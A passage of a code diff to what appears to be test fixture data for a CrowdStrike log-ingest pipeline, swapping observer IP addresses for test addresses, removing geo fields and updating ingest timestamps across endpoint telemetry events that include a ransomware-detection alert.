@@ -8724,18 +7635,18 @@ }, "related": { "hosts": [ - "208.216.128.255" + "67.43.156.13" ], "hash": [ "402097454" ], "ip": [ - "208.216.128.255" + "67.43.156.13" ] }, "event": { - "ingested": "2021-11-22T09:23:55.466099100Z", - "original": "{\"ConfigBuild\":\"1007.3.0011603.1\",\"ConfigStateHash\":\"402097454\",\"ContextProcessId\":\"66601077523\",\"ContextThreadId\":\"2500785639062\",\"ContextTimeStamp\":\"1604855165.213\",\"DesiredAccess\":\"1048577\",\"EffectiveTransmissionClass\":\"3\",\"Entitlements\":\"15\",\"FileAttributes\":\"128\",\"FileIdentifier\":\"d2f4250ff1ba3b4ca66e123c5269884ca6f8020000002700\",\"FileObject\":\"18446641334185168032\",\"Information\":\"2\",\"IrpFlags\":\"2180\",\"MajorFunction\":\"0\",\"MinorFunction\":\"0\",\"OperationFlags\":\"0\",\"Options\":\"35668001\",\"ShareAccess\":\"3\",\"Status\":\"0\",\"TargetFileName\":\"\\\\Device\\\\HarddiskVolume3\\\\Windows\\\\CbsTemp\\\\30848497_1904507751\\\\FodWU\",\"aid\":\"ffffffff2c9f4066b0b5f2f00265503c\",\"aip\":\"208.216.128.255\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Win\",\"event_simpleName\":\"DirectoryCreate\",\"id\":\"ffffffff-1111-11eb-9411-06b7c99be087\",\"name\":\"DirectoryCreateV1\",\"timestamp\":\"1604855180332\"}", + "ingested": "2021-12-09T13:36:11.151200Z", + "original": 
"{\"ConfigBuild\":\"1007.3.0011603.1\",\"ConfigStateHash\":\"402097454\",\"ContextProcessId\":\"66601077523\",\"ContextThreadId\":\"2500785639062\",\"ContextTimeStamp\":\"1604855165.213\",\"DesiredAccess\":\"1048577\",\"EffectiveTransmissionClass\":\"3\",\"Entitlements\":\"15\",\"FileAttributes\":\"128\",\"FileIdentifier\":\"d2f4250ff1ba3b4ca66e123c5269884ca6f8020000002700\",\"FileObject\":\"18446641334185168032\",\"Information\":\"2\",\"IrpFlags\":\"2180\",\"MajorFunction\":\"0\",\"MinorFunction\":\"0\",\"OperationFlags\":\"0\",\"Options\":\"35668001\",\"ShareAccess\":\"3\",\"Status\":\"0\",\"TargetFileName\":\"\\\\Device\\\\HarddiskVolume3\\\\Windows\\\\CbsTemp\\\\30848497_1904507751\\\\FodWU\",\"aid\":\"ffffffff2c9f4066b0b5f2f00265503c\",\"aip\":\"67.43.156.13\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Win\",\"event_simpleName\":\"DirectoryCreate\",\"id\":\"ffffffff-1111-11eb-9411-06b7c99be087\",\"name\":\"DirectoryCreateV1\",\"timestamp\":\"1604855180332\"}", "created": "2020-11-08T17:06:20.332Z", "kind": "event", "action": "DirectoryCreate", @@ -8793,21 +7704,12 @@ "preserve_original_event" ], "observer": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "208.9.106.189", - "vendor": "crowdstrike", - "ip": "208.9.106.189", "serial_number": "fffffffffcc4413057adc260e99b0774", + "address": "67.43.156.14", "type": "agent", - "version": "1007.3.0011603.1" + "version": "1007.3.0011603.1", + "vendor": "crowdstrike", + "ip": "67.43.156.14" }, "@timestamp": "2020-11-08T17:06:36.468Z", "ecs": { 
@@ -8818,18 +7720,18 @@ "user6" ], "hosts": [ - "208.9.106.189" + "67.43.156.14" ], "hash": [ "3343111420" ], "ip": [ - "208.9.106.189" + "67.43.156.14" ] }, "event": { - "ingested": "2021-11-22T09:23:55.466105900Z", - "original": "{\"AuthenticationId\":\"999\",\"CommandLine\":\"C:\\\\WINDOWS\\\\system32\\\\svchost.exe -k netsvcs -p -s wlidsvc\",\"ConfigBuild\":\"1007.3.0011603.1\",\"ConfigStateHash\":\"3343111420\",\"ContextTimeStamp\":\"1604855196.468\",\"EffectiveTransmissionClass\":\"3\",\"Entitlements\":\"15\",\"ImageFileName\":\"\\\\Device\\\\HarddiskVolume3\\\\Windows\\\\System32\\\\svchost.exe\",\"InterfaceGuid\":\"367ABB81-9844-35F1-AD32-98F038001003\",\"InterfaceVersion\":\"131072\",\"RpcClientProcessId\":\"949196415400\",\"RpcClientThreadId\":\"44209361549673\",\"RpcNestingLevel\":\"0\",\"RpcOpNum\":\"19\",\"ServiceDisplayName\":\"wlidsvc\",\"TargetProcessId\":\"955370934902\",\"TokenType\":\"1\",\"UserName\":\"user6\",\"aid\":\"fffffffffcc4413057adc260e99b0774\",\"aip\":\"208.9.106.189\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Win\",\"event_simpleName\":\"ServiceStarted\",\"id\":\"ffffffff-1111-11eb-9c98-02c501fe7d81\",\"name\":\"ServiceStartedV2\",\"timestamp\":\"1604855196635\"}", + "ingested": "2021-12-09T13:36:11.151206400Z", + "original": "{\"AuthenticationId\":\"999\",\"CommandLine\":\"C:\\\\WINDOWS\\\\system32\\\\svchost.exe -k netsvcs -p -s 
wlidsvc\",\"ConfigBuild\":\"1007.3.0011603.1\",\"ConfigStateHash\":\"3343111420\",\"ContextTimeStamp\":\"1604855196.468\",\"EffectiveTransmissionClass\":\"3\",\"Entitlements\":\"15\",\"ImageFileName\":\"\\\\Device\\\\HarddiskVolume3\\\\Windows\\\\System32\\\\svchost.exe\",\"InterfaceGuid\":\"367ABB81-9844-35F1-AD32-98F038001003\",\"InterfaceVersion\":\"131072\",\"RpcClientProcessId\":\"949196415400\",\"RpcClientThreadId\":\"44209361549673\",\"RpcNestingLevel\":\"0\",\"RpcOpNum\":\"19\",\"ServiceDisplayName\":\"wlidsvc\",\"TargetProcessId\":\"955370934902\",\"TokenType\":\"1\",\"UserName\":\"user6\",\"aid\":\"fffffffffcc4413057adc260e99b0774\",\"aip\":\"67.43.156.14\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Win\",\"event_simpleName\":\"ServiceStarted\",\"id\":\"ffffffff-1111-11eb-9c98-02c501fe7d81\",\"name\":\"ServiceStartedV2\",\"timestamp\":\"1604855196635\"}", "created": "2020-11-08T17:06:36.635Z", "kind": "event", "action": "ServiceStarted", @@ -8890,21 +7792,12 @@ "direction": "outbound" }, "observer": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "208.62.90.250", - "vendor": "crowdstrike", - "ip": "208.62.90.250", "serial_number": "ffffffffed0f41575620ab9fb25ce105", + "address": "67.43.156.14", "type": "agent", - "version": "1007.4.0011104.1" + "version": "1007.4.0011104.1", + "vendor": "crowdstrike", + "ip": "67.43.156.14" }, "@timestamp": "2020-11-08T17:06:40.751Z", "ecs": { @@ -8912,7 +7805,7 @@ }, "related": { "hosts": [ - "208.62.90.250", + "67.43.156.14", "0:0:0:0:0:0:0:0", "0:0:0:0:0:0:0:1" ], 
@@ -8920,14 +7813,14 @@ "203564169" ], "ip": [ - "208.62.90.250", + "67.43.156.14", "0:0:0:0:0:0:0:0", "0:0:0:0:0:0:0:1" ] }, "event": { - "ingested": "2021-11-22T09:23:55.466112500Z", - "original": "{\"ConfigBuild\":\"1007.4.0011104.1\",\"ConfigStateHash\":\"203564169\",\"ConnectionDirection\":\"0\",\"ConnectionFlags\":\"0\",\"ContextProcessId\":\"319255017313886870\",\"ContextTimeStamp\":\"1604855200.751\",\"Entitlements\":\"15\",\"InContext\":\"0\",\"LocalAddressIP6\":\"0:0:0:0:0:0:0:0\",\"LocalPort\":\"0\",\"Protocol\":\"6\",\"RemoteAddressIP6\":\"0:0:0:0:0:0:0:1\",\"RemotePort\":\"2181\",\"aid\":\"ffffffffed0f41575620ab9fb25ce105\",\"aip\":\"208.62.90.250\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Mac\",\"event_simpleName\":\"NetworkConnectIP6\",\"id\":\"ffffffff-1111-11eb-81f1-061cdebbd115\",\"name\":\"NetworkConnectIP6MacV5\",\"timestamp\":\"1604855200836\"}", + "ingested": "2021-12-09T13:36:11.151212800Z", + "original": "{\"ConfigBuild\":\"1007.4.0011104.1\",\"ConfigStateHash\":\"203564169\",\"ConnectionDirection\":\"0\",\"ConnectionFlags\":\"0\",\"ContextProcessId\":\"319255017313886870\",\"ContextTimeStamp\":\"1604855200.751\",\"Entitlements\":\"15\",\"InContext\":\"0\",\"LocalAddressIP6\":\"0:0:0:0:0:0:0:0\",\"LocalPort\":\"0\",\"Protocol\":\"6\",\"RemoteAddressIP6\":\"0:0:0:0:0:0:0:1\",\"RemotePort\":\"2181\",\"aid\":\"ffffffffed0f41575620ab9fb25ce105\",\"aip\":\"67.43.156.14\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Mac\",\"event_simpleName\":\"NetworkConnectIP6\",\"id\":\"ffffffff-1111-11eb-81f1-061cdebbd115\",\"name\":\"NetworkConnectIP6MacV5\",\"timestamp\":\"1604855200836\"}", "created": "2020-11-08T17:06:40.836Z", "kind": "event", "action": "NetworkConnectIP6", 
@@ -8967,21 +7860,12 @@ "preserve_original_event" ], "observer": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "208.216.134.209", - "vendor": "crowdstrike", - "ip": "208.216.134.209", "serial_number": "ffffffff73164cfa9656c4caff8a2a38", + "address": "67.43.156.13", "type": "agent", - "version": "1007.3.0011603.1" + "version": "1007.3.0011603.1", + "vendor": "crowdstrike", + "ip": "67.43.156.13" }, "@timestamp": "2020-11-08T17:06:52.031Z", "ecs": { 
@@ -8992,19 +7876,19 @@ "user7" ], "hosts": [ - "208.216.134.209", + "67.43.156.13", "srv1" ], "hash": [ "3338885535" ], "ip": [ - "208.216.134.209" + "67.43.156.13" ] }, "event": { - "ingested": "2021-11-22T09:23:55.466119300Z", - "original": "{\"AuthenticationId\":\"1656178821\",\"AuthenticationPackage\":\"Kerberos\",\"ConfigBuild\":\"1007.3.0011603.1\",\"ConfigStateHash\":\"3338885535\",\"ContextProcessId\":\"30254389526587\",\"ContextThreadId\":\"275230771323179\",\"EffectiveTransmissionClass\":\"2\",\"Entitlements\":\"15\",\"LogonDomain\":\"dom1\",\"LogonId\":\"1656178821\",\"LogonServer\":\"srv1\",\"LogonTime\":\"1604855211.249\",\"LogonType\":\"5\",\"PasswordLastSet\":\"1530626210.104\",\"RemoteAccount\":\"1\",\"SessionId\":\"0\",\"UserCanonical\":\"\",\"UserFlags\":\"32\",\"UserIsAdmin\":\"0\",\"UserLogonFlags\":\"0\",\"UserName\":\"user7\",\"UserPrincipal\":\"user7@dom4.cm\",\"UserSid\":\"S-1-5-21-606747145-1364589140-725345543-183372\",\"aid\":\"ffffffff73164cfa9656c4caff8a2a38\",\"aip\":\"208.216.134.209\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Win\",\"event_simpleName\":\"UserIdentity\",\"id\":\"ffffffff-1111-11eb-86e3-02db1faa1327\",\"name\":\"UserIdentityV2\",\"timestamp\":\"1604855212031\"}", + "ingested": "2021-12-09T13:36:11.151219100Z", + "original": 
"{\"AuthenticationId\":\"1656178821\",\"AuthenticationPackage\":\"Kerberos\",\"ConfigBuild\":\"1007.3.0011603.1\",\"ConfigStateHash\":\"3338885535\",\"ContextProcessId\":\"30254389526587\",\"ContextThreadId\":\"275230771323179\",\"EffectiveTransmissionClass\":\"2\",\"Entitlements\":\"15\",\"LogonDomain\":\"dom1\",\"LogonId\":\"1656178821\",\"LogonServer\":\"srv1\",\"LogonTime\":\"1604855211.249\",\"LogonType\":\"5\",\"PasswordLastSet\":\"1530626210.104\",\"RemoteAccount\":\"1\",\"SessionId\":\"0\",\"UserCanonical\":\"\",\"UserFlags\":\"32\",\"UserIsAdmin\":\"0\",\"UserLogonFlags\":\"0\",\"UserName\":\"user7\",\"UserPrincipal\":\"user7@dom4.cm\",\"UserSid\":\"S-1-5-21-606747145-1364589140-725345543-183372\",\"aid\":\"ffffffff73164cfa9656c4caff8a2a38\",\"aip\":\"67.43.156.13\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Win\",\"event_simpleName\":\"UserIdentity\",\"id\":\"ffffffff-1111-11eb-86e3-02db1faa1327\",\"name\":\"UserIdentityV2\",\"timestamp\":\"1604855212031\"}", "created": "2020-11-08T17:06:52.031Z", "kind": "event", "action": "UserIdentity", @@ -9080,24 +7964,12 @@ "preserve_original_event" ], "observer": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-AL", - "city_name": "Birmingham", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Alabama", - "location": { - "lon": -86.7014, - "lat": 33.6454 - } - }, - "address": "208.65.31.23", - "vendor": "crowdstrike", - "ip": "208.65.31.23", "serial_number": "ffffffffbe8a46386afe80c5ef64d0b5", + "address": "67.43.156.14", "type": "agent", - "version": "1007.3.0010609.1" + "version": "1007.3.0010609.1", + "vendor": "crowdstrike", + "ip": "67.43.156.14" }, "@timestamp": "2020-11-08T17:07:17.946Z", "ecs": { @@ -9105,7 +7977,7 @@ }, "related": { "hosts": [ - "208.65.31.23" + "67.43.156.14" ], "hash": [ "8a0a29438052faed8a2532da50455756", 
@@ -9113,12 +7985,12 @@ "4193986770" ], "ip": [ - "208.65.31.23" + "67.43.156.14" ] }, "event": { - "ingested": "2021-11-22T09:23:55.466126Z", - "original": "{\"AuthenticationId\":\"999\",\"CommandLine\":\"C:\\\\WINDOWS\\\\System32\\\\svchost.exe -k netsvcs -p -s NetSetupSvc\",\"ConfigBuild\":\"1007.3.0010609.1\",\"ConfigStateHash\":\"4193986770\",\"EffectiveTransmissionClass\":\"3\",\"Entitlements\":\"15\",\"ImageFileName\":\"\\\\Device\\\\HarddiskVolume3\\\\Windows\\\\System32\\\\svchost.exe\",\"ImageSubsystem\":\"2\",\"IntegrityLevel\":\"16384\",\"MD5HashData\":\"8a0a29438052faed8a2532da50455756\",\"ParentAuthenticationId\":\"999\",\"ParentProcessId\":\"2881931477041\",\"ProcessCreateFlags\":\"525324\",\"ProcessEndTime\":\"\",\"ProcessParameterFlags\":\"8193\",\"ProcessStartTime\":\"1604842733.215\",\"ProcessSxsFlags\":\"64\",\"RawProcessId\":\"6160\",\"SHA1HashData\":\"0000000000000000000000000000000000000000\",\"SHA256HashData\":\"7fd065bac18c5278777ae44908101cdfed72d26fa741367f0ad4d02020787ab6\",\"SessionId\":\"0\",\"SourceProcessId\":\"2881931477041\",\"SourceThreadId\":\"70316664105336\",\"Tags\":\"27, 29, 53, 54, 55, 185, 10445360464024, 10445360464025, 10445360464026, 10445360464258, 10445360464273, 10445360464274, 12094627905582, 12094627906234, 211655988347297\",\"TargetProcessId\":\"2882232404222\",\"TokenType\":\"2\",\"UserSid\":\"S-1-5-18\",\"WindowFlags\":\"128\",\"aid\":\"ffffffffbe8a46386afe80c5ef64d0b5\",\"aip\":\"208.65.31.23\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Win\",\"event_simpleName\":\"ProcessRollup2\",\"id\":\"ffffffff-1111-11eb-b4f9-06e3a7e5503b\",\"name\":\"ProcessRollup2V16\",\"timestamp\":\"1604855237946\"}", + "ingested": "2021-12-09T13:36:11.151225300Z", + "original": "{\"AuthenticationId\":\"999\",\"CommandLine\":\"C:\\\\WINDOWS\\\\System32\\\\svchost.exe -k netsvcs -p -s 
NetSetupSvc\",\"ConfigBuild\":\"1007.3.0010609.1\",\"ConfigStateHash\":\"4193986770\",\"EffectiveTransmissionClass\":\"3\",\"Entitlements\":\"15\",\"ImageFileName\":\"\\\\Device\\\\HarddiskVolume3\\\\Windows\\\\System32\\\\svchost.exe\",\"ImageSubsystem\":\"2\",\"IntegrityLevel\":\"16384\",\"MD5HashData\":\"8a0a29438052faed8a2532da50455756\",\"ParentAuthenticationId\":\"999\",\"ParentProcessId\":\"2881931477041\",\"ProcessCreateFlags\":\"525324\",\"ProcessEndTime\":\"\",\"ProcessParameterFlags\":\"8193\",\"ProcessStartTime\":\"1604842733.215\",\"ProcessSxsFlags\":\"64\",\"RawProcessId\":\"6160\",\"SHA1HashData\":\"0000000000000000000000000000000000000000\",\"SHA256HashData\":\"7fd065bac18c5278777ae44908101cdfed72d26fa741367f0ad4d02020787ab6\",\"SessionId\":\"0\",\"SourceProcessId\":\"2881931477041\",\"SourceThreadId\":\"70316664105336\",\"Tags\":\"27, 29, 53, 54, 55, 185, 10445360464024, 10445360464025, 10445360464026, 10445360464258, 10445360464273, 10445360464274, 12094627905582, 12094627906234, 211655988347297\",\"TargetProcessId\":\"2882232404222\",\"TokenType\":\"2\",\"UserSid\":\"S-1-5-18\",\"WindowFlags\":\"128\",\"aid\":\"ffffffffbe8a46386afe80c5ef64d0b5\",\"aip\":\"67.43.156.14\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Win\",\"event_simpleName\":\"ProcessRollup2\",\"id\":\"ffffffff-1111-11eb-b4f9-06e3a7e5503b\",\"name\":\"ProcessRollup2V16\",\"timestamp\":\"1604855237946\"}", "created": "2020-11-08T17:07:17.946Z", "kind": "event", "action": "ProcessRollup2", 
@@ -9188,21 +8060,12 @@ "preserve_original_event" ], "observer": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "208.226.182.36", - "vendor": "crowdstrike", - "ip": "208.226.182.36", "serial_number": "ffffffffac4148947ed68497e89f3308", + "address": "67.43.156.14", "type": "agent", - "version": "1007.3.0011603.1" + "version": "1007.3.0011603.1", + "vendor": "crowdstrike", + "ip": "67.43.156.14" }, "@timestamp": "2020-11-08T09:58:32.519Z", "file": { 
@@ -9218,18 +8081,18 @@ }, "related": { "hosts": [ - "208.226.182.36" + "67.43.156.14" ], "hash": [ "1763245019" ], "ip": [ - "208.226.182.36" + "67.43.156.14" ] }, "event": { - "ingested": "2021-11-22T09:23:55.466132700Z", - "original": "{\"ConfigBuild\":\"1007.3.0011603.1\",\"ConfigStateHash\":\"1763245019\",\"ContextProcessId\":\"1016182570608\",\"ContextThreadId\":\"37343520154472\",\"ContextTimeStamp\":\"1604829512.519\",\"DesiredAccess\":\"1179785\",\"EffectiveTransmissionClass\":\"3\",\"Entitlements\":\"15\",\"FileAttributes\":\"0\",\"FileIdentifier\":\"7a9c1c1610045d45a54bd6643ac12ea767a5020000000c00\",\"FileObject\":\"18446670458156489088\",\"Information\":\"1\",\"IrpFlags\":\"2180\",\"MajorFunction\":\"0\",\"MinorFunction\":\"0\",\"OperationFlags\":\"0\",\"Options\":\"16777312\",\"ShareAccess\":\"5\",\"Status\":\"0\",\"TargetFileName\":\"\\\\Device\\\\HarddiskVolume3\\\\Users\\\\user11\\\\Downloads\\\\file.pptx\",\"aid\":\"ffffffffac4148947ed68497e89f3308\",\"aip\":\"208.226.182.36\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Win\",\"event_simpleName\":\"RansomwareOpenFile\",\"id\":\"ffffffff-1111-11eb-9756-06fe7f8f682f\",\"name\":\"RansomwareOpenFileV4\",\"timestamp\":\"1604855242091\"}", + "ingested": "2021-12-09T13:36:11.151231700Z", + "original": 
"{\"ConfigBuild\":\"1007.3.0011603.1\",\"ConfigStateHash\":\"1763245019\",\"ContextProcessId\":\"1016182570608\",\"ContextThreadId\":\"37343520154472\",\"ContextTimeStamp\":\"1604829512.519\",\"DesiredAccess\":\"1179785\",\"EffectiveTransmissionClass\":\"3\",\"Entitlements\":\"15\",\"FileAttributes\":\"0\",\"FileIdentifier\":\"7a9c1c1610045d45a54bd6643ac12ea767a5020000000c00\",\"FileObject\":\"18446670458156489088\",\"Information\":\"1\",\"IrpFlags\":\"2180\",\"MajorFunction\":\"0\",\"MinorFunction\":\"0\",\"OperationFlags\":\"0\",\"Options\":\"16777312\",\"ShareAccess\":\"5\",\"Status\":\"0\",\"TargetFileName\":\"\\\\Device\\\\HarddiskVolume3\\\\Users\\\\user11\\\\Downloads\\\\file.pptx\",\"aid\":\"ffffffffac4148947ed68497e89f3308\",\"aip\":\"67.43.156.14\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Win\",\"event_simpleName\":\"RansomwareOpenFile\",\"id\":\"ffffffff-1111-11eb-9756-06fe7f8f682f\",\"name\":\"RansomwareOpenFileV4\",\"timestamp\":\"1604855242091\"}", "created": "2020-11-08T17:07:22.091Z", "kind": "alert", "action": "RansomwareOpenFile", @@ -9287,21 +8150,12 @@ "preserve_original_event" ], "observer": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "208.216.134.192", - "vendor": "crowdstrike", - "ip": "208.216.134.192", "serial_number": "fffffffffdab492a5a20cd0417395a73", + "address": "67.43.156.13", "type": "agent", - "version": "1007.3.0010609.1" + "version": "1007.3.0010609.1", + "vendor": "crowdstrike", + "ip": "67.43.156.13" }, "@timestamp": "2020-11-08T17:07:54.377Z", "ecs": { 
@@ -9309,19 +8163,19 @@ }, "related": { "hosts": [ - "208.216.134.192" + "67.43.156.13" ], "hash": [ "87419b84f34cdb13f699c0f0803c957e48c27ad83334fcad7bac9ad89c0a466f", "2030177841" ], "ip": [ - "208.216.134.192" + "67.43.156.13" ] }, "event": { - "ingested": "2021-11-22T09:23:55.466139400Z", - "original": "{\"AllocateVirtualMemoryCount\":\"0\",\"ArchiveFileWrittenCount\":\"0\",\"AsepWrittenCount\":\"0\",\"BinaryExecutableWrittenCount\":\"0\",\"CLICreationCount\":\"0\",\"ConHostId\":\"13532\",\"ConHostProcessId\":\"1731198143955\",\"ConfigBuild\":\"1007.3.0010609.1\",\"ConfigStateHash\":\"2030177841\",\"ContextData\":\"\",\"ContextProcessId\":\"1741732942772\",\"ContextThreadId\":\"28523520529271\",\"ContextTimeStamp\":\"1604855274.377\",\"CycleTime\":\"473618996\",\"DirectoryCreatedCount\":\"0\",\"DirectoryEnumeratedCount\":\"0\",\"DnsRequestCount\":\"0\",\"DocumentFileWrittenCount\":\"0\",\"EffectiveTransmissionClass\":\"3\",\"Entitlements\":\"15\",\"ExeAndServiceCount\":\"0\",\"ExecutableDeletedCount\":\"0\",\"ExitCode\":\"0\",\"FileDeletedCount\":\"0\",\"GenericFileWrittenCount\":\"0\",\"ImageSubsystem\":\"2\",\"InjectedDllCount\":\"0\",\"InjectedThreadCount\":\"0\",\"KernelTime\":\"1406250\",\"MaxThreadCount\":\"16\",\"ModuleLoadCount\":\"72\",\"NetworkBindCount\":\"0\",\"NetworkCapableAsepWriteCount\":\"0\",\"NetworkCloseCount\":\"0\",\"NetworkConnectCount\":\"0\",\"NetworkConnectCountUdp\":\"0\",\"NetworkListenCount\":\"0\",\"NetworkModuleLoadCount\":\"0\",\"NetworkRecvAcceptCount\":\"0\",\"NewExecutableWrittenCount\":\"0\",\"ParentProcessId\":\"1731198143955\",\"PrivilegedProcessHandleCount\":\"0\",\"ProcessStartTime\":\"1604855154.465\",\"ProtectVirtualMemoryCount\":\"0\",\"QueueApcCount\":\"0\",\"RawProcessId\":\"18176\",\"RegKeySecurityDecreasedCount\":\"0\",\"RemovableDiskFileWrittenCount\":\"0\",\"RunDllInvocationCount\":\"0\",\"SHA256HashData\":\"87419b84f34cdb13f699c0f0803c957e48c27ad83334fcad7bac9ad89c0a466f\",\"ScreenshotsTakenCount\":\"0\",\"Script
EngineInvocationCount\":\"0\",\"ServiceEventCount\":\"0\",\"SetThreadContextCount\":\"0\",\"SnapshotFileOpenCount\":\"0\",\"SuspectStackCount\":\"0\",\"SuspiciousCredentialModuleLoadCount\":\"0\",\"SuspiciousDnsRequestCount\":\"0\",\"SuspiciousFontLoadCount\":\"0\",\"SuspiciousRawDiskReadCount\":\"0\",\"TargetProcessId\":\"1741732942772\",\"UnsignedModuleLoadCount\":\"0\",\"UserMemoryAllocateExecutableCount\":\"0\",\"UserMemoryAllocateExecutableRemoteCount\":\"0\",\"UserMemoryProtectExecutableCount\":\"0\",\"UserMemoryProtectExecutableRemoteCount\":\"0\",\"UserSid\":\"S-1-12-1-1647509123-1308660782-3901357462-3999411581\",\"UserTime\":\"781250\",\"aid\":\"fffffffffdab492a5a20cd0417395a73\",\"aip\":\"208.216.134.192\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Win\",\"event_simpleName\":\"EndOfProcess\",\"id\":\"ffffffff-1111-11eb-b685-0241eaddc553\",\"name\":\"EndOfProcessV14\",\"timestamp\":\"1604855276657\"}", + "ingested": "2021-12-09T13:36:11.151237900Z", + "original": 
"{\"AllocateVirtualMemoryCount\":\"0\",\"ArchiveFileWrittenCount\":\"0\",\"AsepWrittenCount\":\"0\",\"BinaryExecutableWrittenCount\":\"0\",\"CLICreationCount\":\"0\",\"ConHostId\":\"13532\",\"ConHostProcessId\":\"1731198143955\",\"ConfigBuild\":\"1007.3.0010609.1\",\"ConfigStateHash\":\"2030177841\",\"ContextData\":\"\",\"ContextProcessId\":\"1741732942772\",\"ContextThreadId\":\"28523520529271\",\"ContextTimeStamp\":\"1604855274.377\",\"CycleTime\":\"473618996\",\"DirectoryCreatedCount\":\"0\",\"DirectoryEnumeratedCount\":\"0\",\"DnsRequestCount\":\"0\",\"DocumentFileWrittenCount\":\"0\",\"EffectiveTransmissionClass\":\"3\",\"Entitlements\":\"15\",\"ExeAndServiceCount\":\"0\",\"ExecutableDeletedCount\":\"0\",\"ExitCode\":\"0\",\"FileDeletedCount\":\"0\",\"GenericFileWrittenCount\":\"0\",\"ImageSubsystem\":\"2\",\"InjectedDllCount\":\"0\",\"InjectedThreadCount\":\"0\",\"KernelTime\":\"1406250\",\"MaxThreadCount\":\"16\",\"ModuleLoadCount\":\"72\",\"NetworkBindCount\":\"0\",\"NetworkCapableAsepWriteCount\":\"0\",\"NetworkCloseCount\":\"0\",\"NetworkConnectCount\":\"0\",\"NetworkConnectCountUdp\":\"0\",\"NetworkListenCount\":\"0\",\"NetworkModuleLoadCount\":\"0\",\"NetworkRecvAcceptCount\":\"0\",\"NewExecutableWrittenCount\":\"0\",\"ParentProcessId\":\"1731198143955\",\"PrivilegedProcessHandleCount\":\"0\",\"ProcessStartTime\":\"1604855154.465\",\"ProtectVirtualMemoryCount\":\"0\",\"QueueApcCount\":\"0\",\"RawProcessId\":\"18176\",\"RegKeySecurityDecreasedCount\":\"0\",\"RemovableDiskFileWrittenCount\":\"0\",\"RunDllInvocationCount\":\"0\",\"SHA256HashData\":\"87419b84f34cdb13f699c0f0803c957e48c27ad83334fcad7bac9ad89c0a466f\",\"ScreenshotsTakenCount\":\"0\",\"ScriptEngineInvocationCount\":\"0\",\"ServiceEventCount\":\"0\",\"SetThreadContextCount\":\"0\",\"SnapshotFileOpenCount\":\"0\",\"SuspectStackCount\":\"0\",\"SuspiciousCredentialModuleLoadCount\":\"0\",\"SuspiciousDnsRequestCount\":\"0\",\"SuspiciousFontLoadCount\":\"0\",\"SuspiciousRawDiskReadCount\":\"0\",\"Tar
getProcessId\":\"1741732942772\",\"UnsignedModuleLoadCount\":\"0\",\"UserMemoryAllocateExecutableCount\":\"0\",\"UserMemoryAllocateExecutableRemoteCount\":\"0\",\"UserMemoryProtectExecutableCount\":\"0\",\"UserMemoryProtectExecutableRemoteCount\":\"0\",\"UserSid\":\"S-1-12-1-1647509123-1308660782-3901357462-3999411581\",\"UserTime\":\"781250\",\"aid\":\"fffffffffdab492a5a20cd0417395a73\",\"aip\":\"67.43.156.13\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Win\",\"event_simpleName\":\"EndOfProcess\",\"id\":\"ffffffff-1111-11eb-b685-0241eaddc553\",\"name\":\"EndOfProcessV14\",\"timestamp\":\"1604855276657\"}", "created": "2020-11-08T17:07:56.657Z", "kind": "event", "action": "EndOfProcess", @@ -9416,21 +8270,12 @@ "preserve_original_event" ], "observer": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "208.216.134.214", - "vendor": "crowdstrike", - "ip": "208.216.134.214", "serial_number": "fffffffffa474d216472f3edb73c75ed", + "address": "67.43.156.13", "type": "agent", - "version": "1007.3.0011603.1" + "version": "1007.3.0011603.1", + "vendor": "crowdstrike", + "ip": "67.43.156.13" }, "@timestamp": "2020-11-08T17:08:37.892Z", "file": { 
@@ -9447,18 +8292,18 @@ }, "related": { "hosts": [ - "208.216.134.214" + "67.43.156.13" ], "hash": [ "3338885535" ], "ip": [ - "208.216.134.214" + "67.43.156.13" ] }, "event": { - "ingested": "2021-11-22T09:23:55.466146100Z", - "original": 